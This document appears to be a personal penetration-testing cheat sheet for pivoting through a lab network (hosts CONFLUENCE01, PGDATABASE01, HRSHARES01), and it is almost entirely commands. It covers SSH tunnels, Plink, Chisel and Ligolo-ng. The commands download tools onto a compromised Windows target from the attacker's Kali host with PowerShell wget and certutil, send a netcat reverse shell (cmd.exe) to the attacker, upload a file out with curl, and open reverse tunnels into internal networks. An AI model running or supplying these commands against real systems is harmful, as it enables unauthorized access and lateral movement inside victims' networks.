Windows
IMPORTANT NOTE
NOTE: REMEBER TO CHANGE THE PORT NUMBER IN /ETC/PROXYCHAINS TO KALI PORT YOU HAVE SET UP. (SAFEST IS TO KEEP ALL THE PORT THE SAME TO AVOID CONFUSION)
SSH.exe
SSH Local Tunneling
On CONFLUENCE01
ssh -N -L 0.0.0.0:<CONFLUENCE01 Port>:<HRSHARES01 IP Address>:<HRSHARES Port> <PGDATABASE01 Username>@<PGDATABASE01 IP Address>On KALI
Any commands running on Kali to be pointed at CONFLUENCE01 IP Address
SSH Dynamic Tunneling
On CONFLUENCE01
ssh -N -D 0.0.0.0:<CONFLUENCE01 Port> <PGDATABASE01 Username>@<PGDATABASE01 IP Address>On Kali
Any commands running on Kali to be pointed at HRSHARES01 IP Address via Proxychains
SSH Remote Port Forwarding
On CONFLUENCE01
ssh -N -R 127.0.0.1:<Kali Port>:<PGDATABASE01 IP Address>:<PGDATABASE01 Port> kali@<Kali IP Address>On Kali
Any commands running on Kali to be pointed at Loopback address
NOTE: Make sure machine is running OpenSSH
SSH Remote Dynamic Port Forwarding
On CONFLUENCE01
ssh -N -R <Kali Port> kali@<Kali IP Address>On Kali
Any commands running on Kali can be pointed at any IP via Proxychains
Plink
NOTE: Make sure can RCE to machine
On Machine
Get Netcat from Kali
powershell wget -Uri http://<Kali IP Address>/nc.exe -Outfile C:\Windows\Temp\nc.exeSet up listener on Kali
Send reverse shell to Kali via RCE
C:\Windows\Temp\nc.exe -e cmd.exe <Kali IP Address> <Kali Port>Get plink.exe
powershell wget -Uri http://<Kali IP Address>/plink.exe -Outfile C:\Windows\Temp\plink.exeExecute port forwarding
C:\Windows\Temp\plink.exe -ssh -l -pw kali -R 127.0.0.1:<Kali Port>:127.0.0.1:3389 <Kali IP Address>The port forwarding above allow us to RDP into the machine
On Kali
Any commands running on Kali to be pointed Loopback
Netsh
NOTE: Make sure to RDP into a user that has Administrative rights
Chisel
On Kali
To start server
chisel server --port 8080 --reverseTo monitor network streams
sudo tcpdump -nvvvXi tun0 tcp port 8080Any commands running on Kali to be pointed at PGDATABASE01 IP Address via Proxychains
On CONFLUENCE01
To install chisel on target machine
iwr -Uri http://<Kali IP Address>:<Kali Port>/chisel.exe -Outfile C:\Windows\Temp\chisel.exeTo port forward
chisel.exe client <Kali IP Address>:<Kali Port> R:socksTo view the error output
chisel.exe client <Kali IP Address>:<Kali Port> R:socks > C:\Windows\Temp\output.txt 2>&1
curl.exe --data-binary @C:\Windows\Temp\output.txt http://<Kali IP Address>:<Kali Port>/Ligolo-Ng
NOTE: When using nmap, add --unprivileged OR -PE to avoid false positives
Setup
On Kali
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
sudo ip route add <Internal net>/24 dev ligolomkdir ligolo && cd ligolomkdir proxy && cd proxy
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
tar -xf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
cd ..mkdir ../agents && cd ../agents
mkdir windows && cd windows
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_windows_amd64.zip
unzip ligolo-ng_agent_0.7.5_windows_amd64.zip && rm ligolo-ng_agent_0.7.5_windows_amd64.zip
cd ..mkdir linux && cd linux
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
tar -xf ligolo-ng_agent_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
cd ..python3 -m http.server 80On Target Machine
certutil -urlcache -split -f http://<Kali IP Address>/<windows / linux>/agent.exeTunnel
On Kali
./proxy -selfcertNOTE: Run the above command in /ligolo/proxy
On Target Machine
agent.exe -connect <Kali IP Address>:<Kali Listening port> -ignore-certNOTE: Once agent connects to server, return to Kali Machine and follow the steps in ligolo-ng console
session<SELECT WHICH SESSION>startNOTE: Add the following if you want the internal to reach you. E.G. reverse shell
listener_add --addr 0.0.0.0:<Kali Port> --to 127.0.0.1:<Kali Port>Verify
listener_listLast updated